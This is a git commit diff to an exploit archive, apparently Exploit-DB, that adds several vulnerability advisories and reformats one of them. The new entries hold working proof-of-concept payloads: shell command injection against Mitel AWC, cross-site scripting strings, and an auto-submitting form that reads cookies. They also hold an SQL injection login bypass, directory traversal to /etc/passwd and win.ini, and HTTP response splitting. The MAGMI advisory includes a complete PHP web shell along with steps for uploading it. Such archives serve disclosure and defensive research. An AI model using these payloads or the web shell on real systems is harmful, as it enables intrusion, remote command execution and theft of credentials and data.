Updated 11_02_2014
This commit is contained in:
parent
9234afd706
commit
46921ae8d6
13 changed files with 200 additions and 37 deletions
11
files.csv
11
files.csv
|
@ -31639,3 +31639,14 @@ id,file,description,date,author,platform,type,port
|
|||
35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0
|
||||
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
|
||||
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0
|
||||
35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
|
||||
35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
|
||||
35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
|
||||
35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
8
platforms/linux/remote/35132.txt
Executable file
8
platforms/linux/remote/35132.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/45537/info
|
||||
|
||||
Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
|
||||
|
||||
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
|
||||
|
||||
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26
|
||||
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26
|
|
@ -1,48 +1,58 @@
|
|||
Exploit found date: 10/24/2014
|
||||
Security Researcher name: Parvinder Singh Bhasin
|
||||
Security Researcher name: Parvinder Bhasin
|
||||
Contact info: parvinder.bhasin@gmail.com
|
||||
twitter: @parvinderb <scorpio>
|
||||
|
||||
twitter: @parvinderb - scorpio
|
||||
|
||||
Currently tested version:
|
||||
Magento version: Magento CE - 1.8 and newer versions
|
||||
MAGMI version: v0.7.17a and greater
|
||||
Magento version: Magento CE - 1.8 older
|
||||
MAGMI version: v0.7.17a older
|
||||
|
||||
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.
|
||||
Download software link:
|
||||
Magento server: http://www.magentocommerce.com/download
|
||||
MAGMI Plugin:
|
||||
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
|
||||
|
||||
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
|
||||
(RFI) which allows an attacker to upload essentially any PHP file (without
|
||||
any sanity checks). This PHP file could then be used to skim credit card
|
||||
data, rewrite files, run remote commands, delete files..etc. Essentially,
|
||||
this gives attacker ability to execute remote commands on the vulnerable
|
||||
server.
|
||||
|
||||
Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.
|
||||
|
||||
Steps to reproduce:
|
||||
|
||||
1. http://<a magentosite.com>/magmi/web/magmi.php
|
||||
2. Under upload new plugins:
|
||||
click on "choose file"
|
||||
MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.
|
||||
|
||||
evil.php:
|
||||
|
||||
<?php
|
||||
if (isset($_POST['command'])){
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
|
||||
if(function_exists('shell_exec')) {
|
||||
$command=$_POST['command'];
|
||||
$output = shell_exec("$command");
|
||||
echo "<pre>$output</pre>";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
}
|
||||
?>
|
||||
|
||||
3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
|
||||
http://<amagentosite.com>/magmi/plugins/evil.php
|
||||
|
||||
At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.
|
||||
click on "choose file"
|
||||
MAGento plugins are basically php file zipped. So create a php shell and
|
||||
zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file
|
||||
has been uploaded, it will say: Plugin packaged installed.
|
||||
evil.php:
|
||||
|
||||
<?php
|
||||
if (isset($_POST['command'])){
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
|
||||
if(function_exists('shell_exec')) {
|
||||
$command=$_POST['command'];
|
||||
$output = shell_exec("$command");
|
||||
echo "<pre>$output</pre>";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
}
|
||||
?>
|
||||
|
||||
3. Your malicious evil.php file is extracted now. All you then need to do
|
||||
is just access the evil.php page from:
|
||||
http://<amagentosite.com>/magmi/plugins/evil.php
|
||||
At this point you could really have access to the entire system. Download
|
||||
any malware, install rootkits, skim credit card data ..etc.etc.
|
||||
|
|
12
platforms/php/webapps/35124.txt
Executable file
12
platforms/php/webapps/35124.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/45522/info
|
||||
|
||||
FreeNAS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
||||
|
||||
|
||||
http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes
|
7
platforms/php/webapps/35125.txt
Executable file
7
platforms/php/webapps/35125.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45523/info
|
||||
|
||||
Openfiler is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0
|
10
platforms/php/webapps/35126.txt
Executable file
10
platforms/php/webapps/35126.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/45530/info
|
||||
|
||||
Habari is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Habari 0.6.5 is affected; other versions may be vulnerable as well.
|
||||
|
||||
http://www.example.com/system/admin/dash_status.php?status_data[1]=<script>alert('XSS');</script>
|
||||
http://www.example.com/system/admin/dash_additem.php?additem_form=<script>alert('XSS');</script>
|
11
platforms/php/webapps/35131.txt
Executable file
11
platforms/php/webapps/35131.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/45536/info
|
||||
|
||||
Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
The following example input is available:
|
||||
|
||||
Username: anytext' or verified=1#
|
||||
|
||||
Password: arbitrary_text
|
16
platforms/php/webapps/35133.txt
Executable file
16
platforms/php/webapps/35133.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/45539/info
|
||||
|
||||
The Mediatricks Viva Thumbs plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit these issues using directory-traversal strings to confirm the existence of local files outside of the WordPress webroot. Information obtained can aid in launching further attacks.
|
||||
|
||||
http://www.example.com/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
|
||||
http://www.example.com/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd
|
||||
http://www.example.com/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
|
||||
http://www.example.com/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
17
platforms/php/webapps/35134.txt
Executable file
17
platforms/php/webapps/35134.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/45541/info
|
||||
|
||||
ImpressCMS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
ImpressCMS 1.2.3 Final is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/modules/content/admin/content.php" method="post" name="main">
|
||||
<input type="hidden" name="quicksearch_ContentContent" value='search"><script>alert(document.cookie)</script>'>
|
||||
<input type="hidden" name="button_quicksearch_ContentContent" value="Search">
|
||||
<input type="hidden" name="filtersel" value="default">
|
||||
<input type="hidden" name="limitsel" value="15">
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
7
platforms/php/webapps/35135.txt
Executable file
7
platforms/php/webapps/35135.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45545/info
|
||||
|
||||
The Classified component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi]
|
10
platforms/php/webapps/35136.txt
Executable file
10
platforms/php/webapps/35136.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/45548/info
|
||||
|
||||
The Accept Signups Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Accept Signups 0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,
|
||||
101, 108, 108, 111, 32, 58, 68, 32))</script>
|
13
platforms/php/webapps/35137.txt
Executable file
13
platforms/php/webapps/35137.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/45550/info
|
||||
|
||||
Social Share is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
|
||||
|
||||
The following example input is available:
|
||||
|
||||
Vulnerable code: $referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer");
|
||||
|
||||
HTTP query ("Referer" field):
|
||||
|
||||
Referer: http://www.example.com/\r\n[second new response]
|
31
platforms/windows/remote/35130.txt
Executable file
31
platforms/windows/remote/35130.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
source: http://www.securityfocus.com/bid/45532/info
|
||||
|
||||
Calibre is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks.
|
||||
|
||||
Calibre 0.7.34 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
error_reporting(E_ALL);
|
||||
$url = "http://www.example.com/static/../jquery.simulate.js";
|
||||
$ch = curl_init();
|
||||
curl_setopt($ch, CURLOPT_URL, $url);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$resp = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
echo $resp;
|
||||
?>
|
||||
|
||||
<?php
|
||||
error_reporting(E_ALL);
|
||||
$url = "http://www.example.com/static/../../../../windows/win.ini.";
|
||||
$ch = curl_init();
|
||||
curl_setopt($ch, CURLOPT_URL, $url);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$resp = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
echo $resp;
|
||||
?>
|
||||
|
||||
http://www.example.com/browse/search?query=<script>alert('waraxe')</script>
|
Loading…
Add table
Reference in a new issue